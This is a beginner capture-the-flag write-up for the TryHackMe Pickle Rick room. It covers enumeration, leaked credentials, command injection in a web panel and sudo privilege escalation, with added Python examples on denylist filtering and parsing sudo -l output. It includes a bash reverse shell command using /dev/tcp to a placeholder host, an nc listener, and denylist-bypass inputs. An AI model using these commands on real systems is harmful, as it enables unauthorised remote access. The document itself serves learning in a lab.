Introduction
Hey folks, volk here. In this writeup we are going to solve and explain the Pickle Rick challenge on TryHackMe.
This is a beginner-level challenge.
Tools Used
Nmap, Gobuster, Netcat (nc)
Enumeration
First, I scanned the target with Nmap to find the open ports, service versions and OS, using the following command:
nmap -A [Machine_IP]
-A: enables OS detection, version detection, script scanning and traceroute
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 bc:c7:d4:7c:21:45:0d:24:d1:30:3a:49:bf:76:5e:ed (RSA)
| 256 88:d5:bc:e4:d2:ef:2a:09:0f:e8:17:95:09:aa:46:77 (ECDSA)
|_ 256 d5:bb:c3:48:97:21:55:2b:70:76:2e:07:4a:bf:70:37 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's check port 80 (HTTP).
Nothing important on the page itself, so I decided to check the source code:
<!DOCTYPE html>
<html lang="en">
<head>
<title>Rick is sup4r cool</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="assets/bootstrap.min.css">
<script src="assets/jquery.min.js"></script>
<script src="assets/bootstrap.min.js"></script>
<style>
.jumbotron {
background-image: url("assets/rickandmorty.jpeg");
background-size: cover;
height: 340px;
}
</style>
</head>
<body>
<div class="container">
<div class="jumbotron"></div>
<h1>Help Morty!</h1></br>
<p>Listen Morty... I need your help, I've turned myself into a pickle again and this time I can't change back!</p></br>
<p>I need you to <b>*BURRRP*</b>....Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is,
I have no idea what the <b>*BURRRRRRRRP*</b>, password was! Help Morty, Help!</p></br>
</div>
<!--
Note to self, remember username!
Username: R1ckRul3s
-->
</body>
</html>
Nice, we found a username leaked in an HTML comment in the source code; we will need it later. I also usually check
robots.txt, since it sometimes holds useful information. When I accessed it I found a single word, and I guessed
that it was the password.
Now let's brute-force directories and files using gobuster:
gobuster dir -u http://10.10.42.251/ -w /usr/share/dirb/wordlists/common.txt -x php,html
dir: directory/file brute-force mode
-u: the target URL
-w: the path of the wordlist to use
-x: file extensions to append to every wordlist entry, so that for "index" gobuster also requests index.php and index.html
That's the result:
===============================================================
/.hta.php (Status: 403) [Size: 295]
/.hta.html (Status: 403) [Size: 296]
/.hta (Status: 403) [Size: 291]
/.htaccess.php (Status: 403) [Size: 300]
/.htpasswd (Status: 403) [Size: 296]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd.php (Status: 403) [Size: 300]
/.htaccess.html (Status: 403) [Size: 301]
/.htpasswd.html (Status: 403) [Size: 301]
/assets (Status: 301) [Size: 313] [--> http://10.10.42.251/assets/]
/denied.php (Status: 302) [Size: 0] [--> /login.php]
/index.html (Status: 200) [Size: 1062]
/index.html (Status: 200) [Size: 1062]
/login.php (Status: 200) [Size: 882]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
/robots.txt (Status: 200) [Size: 17]
/server-status (Status: 403) [Size: 300]
===============================================================
So I found a login page (login.php).
I tried the username and the password I had found:
Username: R1ckRul3s
Password: Wubbalubbadubdub
And it worked 🙂
When I saw the command panel, the first thing that came to mind was command injection, so I typed ls.
It worked, but when I tried to use cat to read a text file I got a message saying that
the command is disabled (cat). So the panel is filtering by command name rather than restricting what the underlying shell can do.
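The panel runs ls but refuses cat, which is how a denylist keyed on command names behaves. The following is an added example, not code from the original writeup or from the Pickle Rick box: it models such a name-based denylist next to an allowlist, so the difference shows on concrete input. The denylist and allowlist contents, the function names and the sample commands are assumptions made for the example.

```python
"""Added example, not code from the original writeup or the Pickle Rick box.

Models a command-panel filter two ways: a denylist that compares literal
words against disabled names (the weak pattern), and an allowlist that
parses the command the way a shell would and only accepts known programs.
The disabled/allowed sets and the sample commands are assumptions.
"""
import shlex

DISABLED = {"cat", "head", "more", "less", "tail"}   # assumed denylist
ALLOWED = {"ls", "pwd", "whoami", "id"}              # assumed allowlist


def denylist_filter(cmd: str) -> bool:
    """Accept unless a whitespace-separated word is a disabled name.

    Weak: the filter compares literal words, but the shell that later runs
    `cmd` applies its own parsing (quotes, other binaries with the same
    effect), so the filter and the shell never agree on what executes.
    """
    return not any(word in DISABLED for word in cmd.split())


def allowlist_filter(cmd: str) -> bool:
    """Accept only a shell-parsed argv whose program is on the allowlist
    and that contains no shell metacharacters at all."""
    if any(ch in cmd for ch in ";|&`$()<>\n"):
        return False
    try:
        argv = shlex.split(cmd)      # same tokenisation a POSIX shell applies
    except ValueError:               # unbalanced quotes
        return False
    return bool(argv) and argv[0] in ALLOWED


def compare(cmd: str) -> tuple[bool, bool]:
    """Return (accepted_by_denylist, accepted_by_allowlist) for one command."""
    return denylist_filter(cmd), allowlist_filter(cmd)


if __name__ == "__main__":
    # Constructed sample inputs for illustration.
    samples = [
        "ls -la",                              # benign, both accept
        "cat Sup3rS3cretPickl3Ingred.txt",     # blocked by name
        "tac Sup3rS3cretPickl3Ingred.txt",     # same effect, different name
        "c'a't Sup3rS3cretPickl3Ingred.txt",   # shell parses as cat; denylist sees c'a't
        "ls; whoami",                          # chained command
    ]
    for s in samples:
        d, a = compare(s)
        print(f"{s!r:40} denylist={d!s:5} allowlist={a}")
```

Run it and the table shows the point: every variant that slips past the denylist is rejected by the allowlist, because the allowlist decides on the parsed program name and refuses metacharacters outright instead of trying to enumerate bad words.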
Gaining Access
I decided to use this bash reverse shell, replacing IP and PORT with my attacking machine's address and listening port:
bash -c 'exec bash -i &>/dev/tcp/IP/PORT <&1'
And used Netcat to listen for the incoming connection:
nc -lvp (PORT)
-l: listen mode (wait for an incoming connection)
-v: verbose
-p: the port to listen on, for example 1337; it must match the PORT used in the reverse shell
We got a connection, and from this real shell we can run cat, since the restriction lived in the web panel, not on the system:
www-data@ip-10-10-42-251:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair
By reading Sup3rS3cretPickl3Ingred.txt, we answered the first question.
I found the second ingredient in the /home/rick directory (note that the filename contains a space, so it has to be quoted):
$ cd /home/rick
$ ls
second ingredients
$ cat "/home/rick/second ingredients"
1 jerry tear
By reading the second ingredients file, we answered the second question.
Privilege Escalation
Usually the last flag (in this challenge, the last ingredient) is in the root directory,
so let's run sudo -l to see which commands this user can execute as root:
Matching Defaults entries for www-data on
ip-10-10-42-251.eu-west-1.compute.internal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on
ip-10-10-42-251.eu-west-1.compute.internal:
(ALL) NOPASSWD: ALL
Surprisingly, www-data may run any command via sudo without a password, so let's run sudo su to become root and change directory to /root
to read the last file:
$ sudo su
#cd /root
#ls
3rd.txt
snap
#cat 3rd.txt
3rd ingredients: fleeb juice
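The sudo -l output above is what made the escalation trivial, and it is worth being able to triage such output automatically during an engagement. The following is an added example, not part of the original writeup: it parses the format printed by sudo -l and flags rules that grant unrestricted root. The sample text is constructed to match the writeup's output, with one extra (constructed) restricted rule added so the parser has something to distinguish; the function names are this example's own.

```python
"""Added example, not part of the original writeup.

Parses the text printed by `sudo -l` (Defaults block, then the
"User X may run the following commands on ..." block) into rules and
flags the ones that hand over unrestricted root, such as
(ALL) NOPASSWD: ALL. Sample input is constructed from the writeup's
output plus one made-up restricted rule for contrast.
"""
import re

# Constructed sample in the layout printed by `sudo -l`.
SAMPLE = """\
Matching Defaults entries for www-data on
    ip-10-10-42-251.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on
    ip-10-10-42-251.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
    (root) /usr/bin/less /var/log/syslog
"""

# One rule line: "(runas[:group]) [TAG: ...] command [args]"
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)


def parse_sudo_l(text: str) -> list[dict]:
    """Return one dict per rule line found after the 'may run' header."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True           # everything after this header is rules
            continue
        if not in_rules:
            continue                  # skip the Defaults block
        m = RULE.match(line)
        if not m:
            continue                  # hostname continuation line, blank, etc.
        runas = m.group("runas").split(":")[0].strip()   # drop ":group" part
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        rules.append({
            "runas": runas,
            "nopasswd": "NOPASSWD" in tags,
            "cmd": m.group("cmd"),
        })
    return rules


def unrestricted(rules: list[dict]) -> list[dict]:
    """Rules that let the caller run any command as root (or as anyone)."""
    return [r for r in rules if r["runas"] in ("ALL", "root") and r["cmd"] == "ALL"]


if __name__ == "__main__":
    parsed = parse_sudo_l(SAMPLE)
    for r in parsed:
        flag = "UNRESTRICTED" if r in unrestricted(parsed) else ""
        print(f"runas={r['runas']:5} nopasswd={r['nopasswd']!s:5} cmd={r['cmd']} {flag}")
```

The parser is deliberately simple: it handles one command per rule line and the common NOPASSWD/SETENV tags, which is enough to spot the (ALL) NOPASSWD: ALL case from the writeup. A rule restricted to a single binary, like the constructed less rule, is reported but not flagged, which is the right place to start a GTFOBins-style check rather than a straight sudo su.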
And we got the root flag (the last ingredient) :) Thanks for reading the writeup, see you in the next one!